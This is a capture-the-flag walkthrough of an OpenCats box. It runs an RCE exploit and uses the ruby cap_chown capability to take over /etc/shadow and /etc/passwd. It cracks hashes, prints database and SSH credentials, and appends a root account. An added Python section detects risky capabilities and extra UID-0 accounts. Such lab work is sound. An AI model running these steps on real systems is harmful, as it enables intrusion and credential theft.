Room Link:
Scans
Initial scan
Kali
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir --url http://$VICTIM/ -w /usr/share/dirb/wordlists/big.txt -l
Kali
echo "$VICTIM job.empline.thm" >> /etc/hosts
Initial Shell
OpenCats 0.9.4 has an RCE exploit.
Kali
chmod +x exploit.sh
./exploit.sh
./exploit.sh http://job.empline.thm/
Victim
getcap -r / 2>/dev/null
Victim
ls -lah /etc/shadow
ruby -e 'require "fileutils"; FileUtils.chown("www-data", "www-data", "/etc/shadow")'
ls -lah /etc/shadow
Victim
Now that we can read both of these files we can transfer them to Kali and run them through john. I let this run for a while but it wasn't cracking any hashes.
cat /etc/passwd
cat /etc/shadow
Kali
unshadow passwd shadow > passwords.txt
Kali
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
I went back to check the box and found the database credentials.
Victim
find / -name "config.php"
cat /var/www/opencats/config.php
Kali
mysql -h $VICTIM -u james -png6pUFvsGNtw
Kali(mysql)
show databases;
use opencats
show tables;
select * from user;
There were a few hashes from users so I put them in crackstation and one returned a result.
TCP/22 - SSH
Kali
ssh george@$VICTIM
Password: pretonnevippasempre
Privilege Escalation
Since I already had access to change any file, I just added a new root user to /etc/passwd.
Victim
ruby -e 'require "fileutils"; FileUtils.chown("george", "george", "/etc/passwd")'
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
su new
Password: 123
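Two defender-side checks for the weaknesses this box turns on, the cap_chown file capability on the ruby binary found with getcap above and the extra UID-0 account appended to /etc/passwd: added example code, not part of the original writeup. The RISKY_CAPS set and the sample getcap/passwd lines are constructed assumptions modelled on the walkthrough, not output captured from the box.

```python
import re

# Capabilities that, on a general-purpose interpreter such as ruby, give
# root-equivalent control over files. Set chosen for this audit (assumption).
RISKY_CAPS = {"cap_chown", "cap_dac_override", "cap_dac_read_search",
              "cap_fowner", "cap_setuid", "cap_setgid", "cap_sys_admin"}

def parse_getcap(output):
    """Parse `getcap -r /` output into (path, set_of_cap_names) pairs.
    Accepts both the older 'path = caps' and newer 'path caps' formats."""
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
        else:
            path, _, caps = line.partition(" ")
        # caps look like "cap_chown,cap_net_raw+ep" or "cap_chown=ep";
        # keep only the comma-separated names before the flag suffix
        names = re.split(r"[=+]", caps, maxsplit=1)[0]
        entries.append((path, {c.strip() for c in names.split(",") if c}))
    return entries

def risky_capabilities(output):
    """Return [(path, [risky caps])] for every binary carrying a RISKY_CAPS entry."""
    hits = []
    for path, caps in parse_getcap(output):
        bad = sorted(caps & RISKY_CAPS)
        if bad:
            hits.append((path, bad))
    return hits

def extra_uid0_accounts(passwd_text):
    """Return account names other than 'root' whose UID field is 0."""
    return [f[0] for f in (l.split(":") for l in passwd_text.splitlines())
            if len(f) >= 7 and f[2] == "0" and f[0] != "root"]

# Constructed sample inputs modelled on the writeup, not captured output.
SAMPLE_GETCAP = "/usr/bin/ping = cap_net_raw+ep\n/usr/local/bin/ruby = cap_chown+ep\n"
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "george:x:1001:1001::/home/george:/bin/bash\n"
                 "new:x:0:0:root:/root:/bin/bash\n")

if __name__ == "__main__":
    print(risky_capabilities(SAMPLE_GETCAP))   # [('/usr/local/bin/ruby', ['cap_chown'])]
    print(extra_uid0_accounts(SAMPLE_PASSWD))  # ['new']
```

On a live host, feed it `getcap -r / 2>/dev/null` and the contents of /etc/passwd; any hit is worth a ticket, since a capability like cap_chown on an interpreter is the whole privilege-escalation path used here.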